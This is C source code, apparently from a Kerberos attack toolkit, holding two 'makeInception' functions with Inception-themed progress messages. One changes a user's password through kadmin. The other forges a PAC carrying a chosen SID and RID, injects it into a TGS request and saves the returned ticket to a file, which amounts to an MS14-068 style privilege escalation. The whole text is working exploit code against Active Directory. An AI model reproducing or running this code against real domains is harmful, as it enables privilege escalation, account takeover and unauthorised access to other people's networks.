void makeInception(PCSTR user, PCSTR domain, PCSTR newpassword, EncryptionKey *key, PCSTR kdc, WORD port, WORD kadminPort)
{
SOCKET connectSocket, connectSocketAdmin;
OssBuf AsReq, ApReq, KrbPrivReq;
KDC_REP *AsRep;
AP_REP *ApRep;
KRB_PRIV *KrbPriv;
EncKDCRepPart *encAsRepPart;
_octet1 password;
EncryptionKey authKey;
UInt32 seq;
EncKrbPrivPart *encKrbPrivPart;
password.length = strlen(newpassword);
password.value = (unsigned char *) newpassword;
if(kull_m_sock_initSocket(kdc, port, &connectSocket))
{
kprintf(" [level 1] Reality (AS-REQ)\n");
if(kull_m_kerberos_asn1_helper_build_KdcReq(user, domain, key, "kadmin", "changepw", NULL, FALSE, NULL, NULL, &AsReq))
{
if(kull_m_kerberos_helper_net_callKdcOssBuf(&connectSocket, &AsReq, (LPVOID *) &AsRep, AS_REP_PDU))
{
if(kull_m_kerberos_asn1_helper_build_EncKDCRepPart_from_Rep(AsRep, &encAsRepPart, key, EncASRepPart_PDU))
{
kprintf(" [level 2] Van Chase (AP-REQ)\n");
if(kull_m_kerberos_asn1_helper_build_ApReq(&ApReq, user, domain, &AsRep->ticket, &encAsRepPart->key, KRB_KEY_USAGE_AP_REQ_AUTHENTICATOR, &authKey, &seq))
{
kprintf(" [level 3] The Hotel (KRB-PRIV - REQ)\n");
if(kull_m_kerberos_asn1_helper_build_KrbPriv(&password, &authKey, "wtf", &KrbPrivReq, &seq))
{
if(kull_m_sock_initSocket(kdc, kadminPort, &connectSocketAdmin))
{
if(kull_m_kerberos_helper_net_callKadminOssBuf(&connectSocketAdmin, &ApReq, &KrbPrivReq, &ApRep, &KrbPriv))
{
kprintf(" [level 4] Snow Fortress (KRB-PRIV - REP)\n");
if(kull_m_kerberos_asn1_helper_build_EncKrbPrivPart_from_Priv(KrbPriv, &encKrbPrivPart, &authKey))
{
kprintf(" [level 5] Limbo ! : ");
retFromKadmin(&encKrbPrivPart->user_data);
kull_m_kerberos_asn1_helper_ossFreePDU(EncKrbPrivPart_PDU, encKrbPrivPart);
}
kull_m_kerberos_asn1_helper_ossFreePDU(KRB_PRIV_PDU, KrbPriv);
kull_m_kerberos_asn1_helper_ossFreePDU(AP_REP_PDU, ApRep);
}
kull_m_sock_termSocket(&connectSocketAdmin);
}
kull_m_kerberos_asn1_helper_ossFreeBuf(KrbPrivReq.value);
}
kull_m_kerberos_asn1_helper_ossFreeBuf(ApReq.value);
}
kull_m_kerberos_asn1_helper_ossFreePDU(EncASRepPart_PDU, encAsRepPart);
}
kull_m_kerberos_asn1_helper_ossFreePDU(AS_REP_PDU, AsRep);
}
kull_m_kerberos_asn1_helper_ossFreeBuf(AsReq.value);
}
kull_m_sock_termSocket(&connectSocket);
}
}
void makeInception(PCSTR user, PCSTR domain, PSID sid, DWORD rid, PCSTR target, PCSTR service, EncryptionKey *key, PCSTR kdc, WORD port, PCSTR filename)
{
SOCKET connectSocket;
OssBuf AsReq, TgsReq;
KDC_REP *AsRep, *TgsRep;
EncKDCRepPart *encAsRepPart, *encTgsRepPart;
_octet1 pac;
if(kull_m_sock_initSocket(kdc, port, &connectSocket))
{
kprintf(" [level 1] Reality (AS-REQ)\n");
if(kull_m_kerberos_asn1_helper_build_KdcReq(user, domain, key, NULL, NULL, FALSE, NULL, NULL, &AsReq))
{
if(kull_m_kerberos_helper_net_callKdcOssBuf(&connectSocket, &AsReq, (LPVOID *) &AsRep, AS_REP_PDU))
{
if(kull_m_kerberos_asn1_helper_build_EncKDCRepPart_from_Rep(AsRep, &encAsRepPart, key, EncASRepPart_PDU))
{
kprintf(" [level 2] Van Chase (PAC TIME)\n");
if(giveMePac(user, sid, rid, &encAsRepPart->authtime, KERB_CHECKSUM_MD5, NULL, &pac))
{
kprintf(" [level 3] The Hotel (TGS-REQ)\n");
if(kull_m_kerberos_asn1_helper_build_KdcReq(user, domain, &encAsRepPart->key, service, target, FALSE, &AsRep->ticket, &pac, &TgsReq))
{
if(kull_m_kerberos_helper_net_callKdcOssBuf(&connectSocket, &TgsReq, (LPVOID *) &TgsRep, TGS_REP_PDU))
{
if(kull_m_kerberos_asn1_helper_build_EncKDCRepPart_from_Rep(TgsRep, &encTgsRepPart, &encAsRepPart->key, EncTGSRepPart_PDU))
{
kprintf(" [level 4-5] Limbo (KRB-CRED)\n");
kull_m_kerberos_helper_util_SaveRepAsKrbCred(TgsRep, encTgsRepPart, filename);
kull_m_kerberos_asn1_helper_ossFreePDU(EncTGSRepPart_PDU, encTgsRepPart);
}
kull_m_kerberos_asn1_helper_ossFreePDU(TGS_REP_PDU, TgsRep);
}
kull_m_kerberos_asn1_helper_ossFreeBuf(TgsReq.value);
}
LocalFree(pac.value);
}
kull_m_kerberos_asn1_helper_ossFreePDU(EncASRepPart_PDU, encAsRepPart);
}
kull_m_kerberos_asn1_helper_ossFreePDU(AS_REP_PDU, AsRep);
}
kull_m_kerberos_asn1_helper_ossFreeBuf(AsReq.value);
}
kull_m_sock_termSocket(&connectSocket);
}
}
